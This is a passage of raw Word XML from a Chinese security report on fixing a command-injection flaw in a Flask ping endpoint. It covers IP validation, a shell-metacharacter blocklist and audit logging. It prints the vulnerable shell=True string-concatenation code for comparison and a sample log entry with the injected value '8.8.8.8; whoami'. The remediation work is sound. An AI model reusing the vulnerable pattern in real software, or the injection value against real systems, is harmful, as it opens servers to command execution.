        <w:t>11.4 修复4：命令注入字符过滤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dangerous = [";", "|", "&amp;", "`", "$", "(", ")"]</w:t>
        <w:br/>
        <w:t>for c in dangerous:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if c in ip_input:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "输入包含非法字符"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.5 修复5：审计日志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# ✅ 记录所有Ping请求</w:t>
        <w:br/>
        <w:t>audit_logger.info(f"Ping请求: ip={ip_input} 用户={session['username']}")</w:t>
        <w:br/>
        <w:br/>
        <w:t># 日志示例（upload_audit.log）：</w:t>
        <w:br/>
        <w:t># 2026-07-16 10:00:00 Ping请求: ip=8.8.8.8; whoami 用户=alice</w:t>
        <w:br/>
        <w:t># 2026-07-16 10:01:00 Ping请求: ip=8.8.8.8 用户=admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.6 完整修复代码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import re, subprocess</w:t>
        <w:br/>
        <w:br/>
        <w:t>IP_PATTERN = r"^(?:\d{1,3}\.){3}\d{1,3}$"</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/ping", methods=["GET", "POST"])</w:t>
        <w:br/>
        <w:t>def ping():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip_input = request.form.get("ip", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 长度限制</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if len(ip_input) &gt; 15:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "输入超出长度限制"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ IP格式白名单</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not re.match(IP_PATTERN, ip_input):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "IP格式不合法"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for p in ip_input.split("."):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if not (0 &lt;= int(p) &lt;= 255):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "IP段超出范围"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 参数列表形式</w:t>
        <w:br/>
        <w:t xml:space="preserve">    audit_logger.info(f"Ping: ip={ip_input}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    output = subprocess.check_output(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ["ping", "-c", "3", ip_input], timeout=30,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stderr=subprocess.STDOUT, universal_newlines=True)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第十二章  修复前后代码对比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app.py（原始漏洞版）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app_fixed.py（修复版）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命令构建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f"ping -c 3 {ip}" ⚠️拼接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["ping","-c","3",ip] ✅参数列表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shell参数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shell=True ⚠️开启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不传shell参数 ✅关闭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IP正则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❌无校验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✅r"^(?:\d{1,3}\.){3}\d{1,3}$"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范围校验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❌无校验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✅0~255校验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长度限制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❌无限制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✅最长15字符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危险字符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❌允许注入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✅拒绝;|&amp;`$()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审计日志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❌无记录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✅logging记录IP+用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>核心修复对比：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>app.py（原始漏洞版）：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cmd = f"ping -c 3 {ip_input}"          # ⚠️ 字符串拼接</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(cmd, shell=True)  # ⚠️ shell=True</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>app_fixed.py（修复版）：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if len(ip_input) &gt; 15: return "超长"   # ✅ 长度限制</w:t>
        <w:br/>
        <w:t>if not re.match(IP_PATTERN, ip_input):  # ✅ IP白名单</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "格式不合法"</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(       # ✅ 无shell</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ["ping", "-c", "3", ip_input])</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>—— 报告结束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